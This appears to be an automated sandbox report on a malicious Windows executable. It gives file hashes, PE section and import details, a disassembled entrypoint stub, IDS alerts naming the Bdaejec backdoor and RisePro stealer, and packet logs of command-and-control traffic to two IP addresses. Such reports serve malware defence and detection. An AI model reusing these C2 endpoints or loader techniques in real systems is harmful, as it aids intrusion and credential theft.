Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\5F314FF5.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\78CB03FC.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\7EF10F8C.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\7F7A79A8.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	4
Entropy (8bit):	1.5
Encrypted:	false
SSDEEP:	3:Nv:9
MD5:	D3B07384D113EDEC49EAA6238AD5FF00
SHA1:	F1D2D2F924E986AC86FDF7B36C94BCDF32BEEC15
SHA-256:	B5BB9D8014A0F9B1D61E21E796D78DCCDF1352F23CD32812F4850B878AE4944C
SHA-512:	0CF9180A764ABA863A67B6D72F0918BC131C6772642CB2DCE5A34F0A702F9470DDC2BF125C12198B1995C233C34B4AFD346C54A2334C350A948A51B6E8B4E6B6
Malicious:	false
Preview:	foo.

C:\Users\user\AppData\Local\Temp\jHYZko.exe

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15872
Entropy (8bit):	7.031075575407894
Encrypted:	false
SSDEEP:	384:IXZQaD7U8iu4YsAa7ZA0UvH2lsRv21yW7GbAxur6+Y9PffPz:gQGPL4vzZq2o9W7GsxBbPr
MD5:	F7D21DE5C4E81341ECCD280C11DDCC9A
SHA1:	D4E9EF10D7685D491583C6FA93AE5D9105D815BD
SHA-256:	4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
SHA-512:	E4553B86B083996038BACFB979AD0B86F578F95185D8EFAC34A77F6CC73E491D4F70E1449BBC9EB1D62F430800C1574101B270E1CB0EEED43A83049A79B636A3
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 92% Antivirus: Virustotal, Detection: 90%, Browse
Joe Sandbox View:	Filename: Lisect_AVT_24003_G1A_84.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_90.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_35.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_54.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_55.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_37.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_79.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_70.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_72.exe, Detection: malicious, Browse Filename: Lisect_AVT_24003_G1A_5.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I.>.'..'.>.'..\.2.'.#.(.?.'.>.&.y.'.Q.#.=.'..).?.'.7...6.'.7...?.'.Rich>.'.................PE..L...JG.R.............................`.......0....@.......................................@..................................p...............................o.......................................................................................text.... ..........................`....rdata.......0......................@....data........@......................@....reloc.......P.......(..............@....aspack.. ...`.......,..............`....adata...............>..............@...................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\rage131MP.tmp

Download File

Process:	C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe
File Type:	ASCII text, with no line terminators
Category:	modified
Size (bytes):	13
Entropy (8bit):	2.6612262562697895
Encrypted:	false
SSDEEP:	3:LEfU5Cc:4U5Cc
MD5:	D19A28CE09FDF2E8A14E0255A35896DA
SHA1:	9CD9C0C7E40DF47C975353251DBF26ED54529BB1
SHA-256:	0B0D335AC7FEDDDFAE67ADA782ED1FCE32A467B4D8EB466EB0854203C8044F24
SHA-512:	57EA12DCC53139210E4107CE0AF322A1B1DDBEC640F39AB6E0365569E43E9E8B7BE92FE5E61C7154DBD68DB4F7AC2B619F890DBEDD84DBDD2C0629409C7F5F32
Malicious:	false
Preview:	1721881057279

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Users\user\AppData\Local\Temp\jHYZko.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.4220933849024755
Encrypted:	false
SSDEEP:	6144:GSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN00uhiTw:lvloTMW+EZMM6DFy603w
MD5:	451C0395A6EC9BFC4189BA911FB38341
SHA1:	5A816D00C495B13086502FFB9071A1DF69A231E5
SHA-256:	2B65BC0C941A719CE65AEEE3F3F1812956CE2EB88E0D389F51E244548EFDCCC6
SHA-512:	ACBB6009E83A8E9F4857A0FD12F7E339C60BE1629D98C5FD0FC69E807855D5EC6A64B233C29C565C669AB7C29D2784623B1712FE9D4211562D2CFDB149363484
Malicious:	false
Preview:	regf?...?....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm6P%.@................................................................................................................................................................................................................................................................................................................................................D3+........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.971437934868994
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Lisect_AVT_24003_G1A_89.exe
File size:	3'146'240 bytes
MD5:	ee50f2db274c7abdbae3713a14020c24
SHA1:	312af659d98d04b23c6ab5f5324604fd04a96777
SHA256:	60285015f8b5e32f20411d30b7c64d8748827409275f5a42053b307bc2ff17de
SHA512:	bbacd094942f9493d58367d19bf5573331d40c7cd96a2b0d4a787de215e9c3c509c1f2f168b2e632c55686b41ae72713abbe9214c04c889f8d3f18ecda9b6b11
SSDEEP:	49152:27lf5RZ4Q9FDCjZtjBJBMndpCqYiCZG5uvmmAwYU9fF4nbGs/cSqyVU5jX:27lf5RWxfaHCqhCZ3dAwY+fFGqnX
TLSH:	ACE533CDAC424837DB05267810D3F6B9026FFC80AD5921DB3DEABF67B672F290526119
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......C...............L.......L.......L.......H.G.....H.......H.......H...R...L.......L.......L.........................E.......-....

File Icon


Icon Hash:	7192ecece8b2924d

Static PE Info

General

Entrypoint:	0xf2a000
Entrypoint Section:	pL~u
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x65CC7EFE [Wed Feb 14 08:51:10 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	59aeb10eab81e92b5597d86d6e338bce

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 0000016Ch
xor eax, eax
push ebx
push esi
push edi
mov dword ptr [ebp-24h], eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-14h], eax
mov dword ptr [ebp-08h], eax
mov dword ptr [ebp-0Ch], eax
mov dword ptr [ebp-20h], eax
mov dword ptr [ebp-18h], eax
mov dword ptr [ebp-48h], 5A59486Ah
mov dword ptr [ebp-44h], 652E6F6Bh
mov dword ptr [ebp-40h], 00006578h
mov dword ptr [ebp-3Ch], 00000000h
call 00007F7F94CEE575h
pop eax
add eax, 00000225h
mov dword ptr [ebp-04h], eax
mov eax, dword ptr fs:[00000030h]
mov dword ptr [ebp-28h], eax
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax], E904C483h
mov eax, dword ptr [ebp-04h]
mov dword ptr [eax+04h], FFFFDB4Bh
mov eax, dword ptr [ebp-28h]
mov eax, dword ptr [eax+0Ch]
mov eax, dword ptr [eax+1Ch]
mov eax, dword ptr [eax]
mov eax, dword ptr [eax+08h]
mov ecx, dword ptr [eax+3Ch]
mov ecx, dword ptr [ecx+eax+78h]
add ecx, eax
mov edi, dword ptr [ecx+1Ch]
mov ebx, dword ptr [ecx+20h]
mov esi, dword ptr [ecx+24h]
mov ecx, dword ptr [ecx+18h]
add esi, eax
add edi, eax
add ebx, eax
xor edx, edx
mov dword ptr [ebp-30h], esi
mov dword ptr [ebp-1Ch], edx
mov dword ptr [ebp-34h], ecx
cmp edx, dword ptr [ebp-34h]
jnc 00007F7F94CEE6BEh
movzx ecx, word ptr [esi+edx*2]
mov edx, dword ptr [ebx+edx*4]
mov esi, dword ptr [edi+ecx*4]
add edx, eax
mov ecx, dword ptr [edx]
add esi, eax
cmp ecx, 4D746547h
jne 00007F7F94CEE5C4h
cmp dword ptr [edx+04h], 6C75646Fh
jne 00007F7F94CEE5BBh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x900020	0xe0c	.data
IMAGE_DIRECTORY_ENTRY_IMPORT	0x900e2c	0x378	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x151000	0x10da0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x900000	0xc	.data
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x10b000	0x73400	55eb848ba0d31b5538ce5486a56747e9	False	0.9996907199023861	data	7.999515690267131	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x10c000	0x27000	0x12200	dbaef748bb072fcaeafb597e7e78824c	False	0.9966460129310345	data	7.995045563532632	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x133000	0x4000	0x800	5b9c17d7889e8d1261c1dd6a3f5a5573	False	0.88623046875	data	7.346914669025697	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x137000	0x11000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
	0x148000	0x9000	0x6400	feee1463b66ca3a8a5e67afaf52a4684	False	0.9948046875	data	7.987242582491748	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x151000	0x11000	0x10e00	af15247632839c1539654f4d4d669c09	False	0.11179108796296296	data	4.305657895869023	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
	0x162000	0x79b000	0x32800	5a48e2befa059bbdc043084df1f8a31b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data	0x8fd000	0x22d000	0x22c400	e6e41b73c1aeeacace7bd5a34f59e138	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
pL~u	0xb2a000	0x5000	0x4200	72cb13911ac8d0f38dd852ec17042113	False	0.7775213068181818	data	6.934637589599884	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x151130	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m	Russian	Russia	0.10367620962971726
RT_GROUP_ICON	0x161958	0x14	data	Russian	Russia	1.15
RT_VERSION	0x16196c	0x2b4	data	Russian	Russia	0.48121387283236994
RT_MANIFEST	0x161c20	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	GetModuleHandleA, GetProcAddress, ExitProcess, LoadLibraryA
user32.dll	MessageBoxA
advapi32.dll	RegCloseKey
oleaut32.dll	SysFreeString
gdi32.dll	CreateFontA
shell32.dll	ShellExecuteA
version.dll	GetFileVersionInfoA
ole32.dll	CoInitializeEx
WS2_32.dll	WSAStartup
CRYPT32.dll	CryptUnprotectData
SHLWAPI.dll	PathFindExtensionA
gdiplus.dll	GdiplusStartup
SETUPAPI.dll	SetupDiEnumDeviceInterfaces
ntdll.dll	RtlUnicodeStringToAnsiString

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Source Port	Dest Port	Source IP	Dest IP
2024-07-25T05:10:44.519984+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49732	799	192.168.2.5	44.221.84.105
2024-07-25T05:09:55.531590+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49704	799	192.168.2.5	44.221.84.105
2024-07-25T05:10:31.462461+0200	TCP	2049060	ET MALWARE RisePro TCP Heartbeat Packet	49728	50500	192.168.2.5	193.233.132.62
2024-07-25T05:10:02.223135+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49707	799	192.168.2.5	44.221.84.105
2024-07-25T05:10:00.675949+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49705	50500	192.168.2.5	193.233.132.62
2024-07-25T05:10:30.346508+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49727	799	192.168.2.5	44.221.84.105
2024-07-25T05:10:13.800528+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49716	20.114.59.183	192.168.2.5
2024-07-25T05:09:59.332194+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49706	799	192.168.2.5	44.221.84.105
2024-07-25T05:10:06.727757+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49709	50500	192.168.2.5	193.233.132.62
2024-07-25T05:10:51.379391+0200	TCP	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	443	49733	20.114.59.183	192.168.2.5
2024-07-25T05:10:06.727684+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49708	50500	192.168.2.5	193.233.132.62
2024-07-25T05:10:38.238368+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49730	799	192.168.2.5	44.221.84.105
2024-07-25T05:10:34.439275+0200	TCP	2046269	ET MALWARE [ANY.RUN] RisePro TCP (Activity)	49728	50500	192.168.2.5	193.233.132.62
2024-07-25T05:10:32.891475+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49729	799	192.168.2.5	44.221.84.105
2024-07-25T05:10:03.590242+0200	TCP	2049060	ET MALWARE RisePro TCP Heartbeat Packet	49709	50500	192.168.2.5	193.233.132.62
2024-07-25T05:10:23.933973+0200	TCP	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	49726	443	192.168.2.5	52.182.143.212
2024-07-25T05:09:57.684082+0200	TCP	2049060	ET MALWARE RisePro TCP Heartbeat Packet	49705	50500	192.168.2.5	193.233.132.62
2024-07-25T05:09:54.991218+0200	UDP	2838522	ETPRO MALWARE Backdoor.Win32/Bdaejec.A CnC Domain in DNS Lookup	50908	53	192.168.2.5	1.1.1.1
2024-07-25T05:10:41.347942+0200	TCP	2807908	ETPRO MALWARE Backdoor.Win32/Bdaejec.A Checkin	49731	799	192.168.2.5	44.221.84.105

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 25, 2024 05:09:55.117422104 CEST	49704	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:55.122926950 CEST	799	49704	44.221.84.105	192.168.2.5
Jul 25, 2024 05:09:55.123014927 CEST	49704	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:55.123308897 CEST	49704	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:55.128104925 CEST	799	49704	44.221.84.105	192.168.2.5
Jul 25, 2024 05:09:55.531443119 CEST	799	49704	44.221.84.105	192.168.2.5
Jul 25, 2024 05:09:55.531498909 CEST	799	49704	44.221.84.105	192.168.2.5
Jul 25, 2024 05:09:55.531589985 CEST	49704	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:55.531589985 CEST	49704	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:55.536416054 CEST	49704	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:55.544678926 CEST	799	49704	44.221.84.105	192.168.2.5
Jul 25, 2024 05:09:57.656136036 CEST	49705	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:09:57.661251068 CEST	50500	49705	193.233.132.62	192.168.2.5
Jul 25, 2024 05:09:57.661364079 CEST	49705	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:09:57.684082031 CEST	49705	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:09:57.689079046 CEST	50500	49705	193.233.132.62	192.168.2.5
Jul 25, 2024 05:09:58.937748909 CEST	49706	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:58.943672895 CEST	799	49706	44.221.84.105	192.168.2.5
Jul 25, 2024 05:09:58.943770885 CEST	49706	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:58.946476936 CEST	49706	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:58.952425957 CEST	799	49706	44.221.84.105	192.168.2.5
Jul 25, 2024 05:09:59.332101107 CEST	799	49706	44.221.84.105	192.168.2.5
Jul 25, 2024 05:09:59.332175970 CEST	799	49706	44.221.84.105	192.168.2.5
Jul 25, 2024 05:09:59.332194090 CEST	49706	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:59.332377911 CEST	49706	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:59.333844900 CEST	49706	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:09:59.338924885 CEST	799	49706	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:00.675949097 CEST	49705	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:00.680938005 CEST	50500	49705	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:01.824809074 CEST	49707	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:01.829797029 CEST	799	49707	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:01.829910994 CEST	49707	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:01.830205917 CEST	49707	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:01.842729092 CEST	799	49707	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:02.222946882 CEST	799	49707	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:02.223134995 CEST	49707	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:02.223145008 CEST	799	49707	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:02.223205090 CEST	49707	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:02.228444099 CEST	49707	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:02.233484030 CEST	799	49707	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:03.554466963 CEST	49708	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:03.559318066 CEST	50500	49708	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:03.559427023 CEST	49708	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:03.562728882 CEST	49709	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:03.567610979 CEST	50500	49709	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:03.567722082 CEST	49709	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:03.572550058 CEST	49708	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:03.577441931 CEST	50500	49708	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:03.590241909 CEST	49709	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:03.597474098 CEST	50500	49709	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:06.727684021 CEST	49708	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:06.727756977 CEST	49709	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:06.733149052 CEST	50500	49708	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:06.733174086 CEST	50500	49709	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:19.044802904 CEST	50500	49705	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:19.044929981 CEST	49705	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:24.946496964 CEST	50500	49709	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:24.947161913 CEST	49709	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:24.947871923 CEST	50500	49708	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:24.947925091 CEST	49708	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:29.935900927 CEST	49727	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:29.941032887 CEST	799	49727	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:29.941102982 CEST	49727	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:29.968799114 CEST	49727	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:29.973977089 CEST	799	49727	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:30.346431971 CEST	799	49727	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:30.346488953 CEST	799	49727	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:30.346508026 CEST	49727	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:30.346551895 CEST	49727	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:30.347642899 CEST	49727	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:30.352441072 CEST	799	49727	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:31.446198940 CEST	49728	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:31.451281071 CEST	50500	49728	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:31.451483965 CEST	49728	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:31.462460995 CEST	49728	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:31.468023062 CEST	50500	49728	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:32.498847008 CEST	49729	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:32.503947020 CEST	799	49729	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:32.504055977 CEST	49729	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:32.504376888 CEST	49729	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:32.511382103 CEST	799	49729	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:32.891344070 CEST	799	49729	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:32.891412020 CEST	799	49729	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:32.891474962 CEST	49729	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:32.892200947 CEST	49729	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:32.892719984 CEST	49729	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:32.897531033 CEST	799	49729	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:34.439275026 CEST	49728	50500	192.168.2.5	193.233.132.62
Jul 25, 2024 05:10:34.444552898 CEST	50500	49728	193.233.132.62	192.168.2.5
Jul 25, 2024 05:10:36.778986931 CEST	49730	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:37.782700062 CEST	49730	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:37.839551926 CEST	799	49730	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:37.839643955 CEST	49730	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:37.839806080 CEST	799	49730	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:37.839843988 CEST	49730	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:37.840507030 CEST	49730	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:37.845310926 CEST	799	49730	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:38.238248110 CEST	799	49730	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:38.238270998 CEST	799	49730	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:38.238368034 CEST	49730	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:38.239454985 CEST	49730	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:38.244259119 CEST	799	49730	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:40.925246000 CEST	49731	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:40.930217028 CEST	799	49731	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:40.930321932 CEST	49731	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:40.968962908 CEST	49731	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:40.973812103 CEST	799	49731	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:41.347846985 CEST	799	49731	44.221.84.105	192.168.2.5
Jul 25, 2024 05:10:41.347942114 CEST	49731	799	192.168.2.5	44.221.84.105
Jul 25, 2024 05:10:41.347970963 CEST	799	49731	44.221.84.105	192.168.2.5
